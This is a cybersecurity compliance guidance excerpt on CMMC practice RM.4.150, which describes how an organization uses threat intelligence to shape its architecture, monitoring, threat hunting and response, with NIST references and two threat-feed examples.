Requirement text: RM.4.150: Employ threat intelligence to inform the development of the system and
security architectures, selection of security solutions, monitoring, threat hunting, and response and recovery activities.
DISCUSSION FROM SOURCE: DRAFT NIST SP 800-171B
The constantly changing and increased sophistication of adversaries, especially the
advanced persistent threat (APT), makes it more likely that adversaries can successfully
compromise or breach organizational systems. Accordingly, threat intelligence can be
integrated into and inform each step of the risk management process throughout the system
development life cycle. This includes defining system security requirements, developing
system and security architectures, selecting security solutions, monitoring (including threat
hunting) and remediation efforts.
Support References:
• NIST SP 800-30 provides guidance on risk assessments.
• NIST SP 800-39 provides guidance on the risk management process.
• NIST SP 800-160-1 provides guidance on security architectures and systems security
engineering.
• NIST SP 800-150 provides guidance on cyber threat information sharing.
CMMC CLARIFICATION
Threat intelligence (See RM.4.149 and SA.3.169) provides for an organization with a better
understanding of the adversaries and their TTPs. This understanding helps an organization
plan, design, architect, and integrate solutions in a manner that will help thwart adversary
activities. This understanding should be used to design the enterprise architecture as well
as the endpoint monitoring capabilities and to plan threat hunting actions. Threat
intelligence can be very valuable when an organization is building their defensive playbook.
Having defensive response and recovery actions planned prior to an attack taking place is
key to having efficient and timely defensive cyber operation actions.
Practice IR.4.100 requires a similar use of adversary knowledge for incident response and
execution.
Example 1
Your organization recently started subscribing to a threat feed service to gain valuable
intelligence on adversary actions and what is currently happening against other
organizations. Based on information gained from this service, your DCO team utilizes the
information to hunt for adversary TTPs received from the service every day. This
information helps provide up-to-date TTPs, and it also provide the latest adversarial actions
taking place across other organizations subscribing to the threat feed, as well. This
information is invaluable in molding your architecture towards specific threats as the
information is received.
Example 2
Your new threat feed has recently sent out information that states a specific action against a
specific vendor solution is underway at various organizations similar to your own. This
information is passed to your DCO team for hunting operations, and the architecture team
utilizes it to make small adjustments to the organizations enterprise architecture that
prevents similar tactics from being successful in your environment.
References
• Draft NIST SP 800-171B 3.11.1e
• NIST CSF v1.1 ID.RA-2, ID.RA-3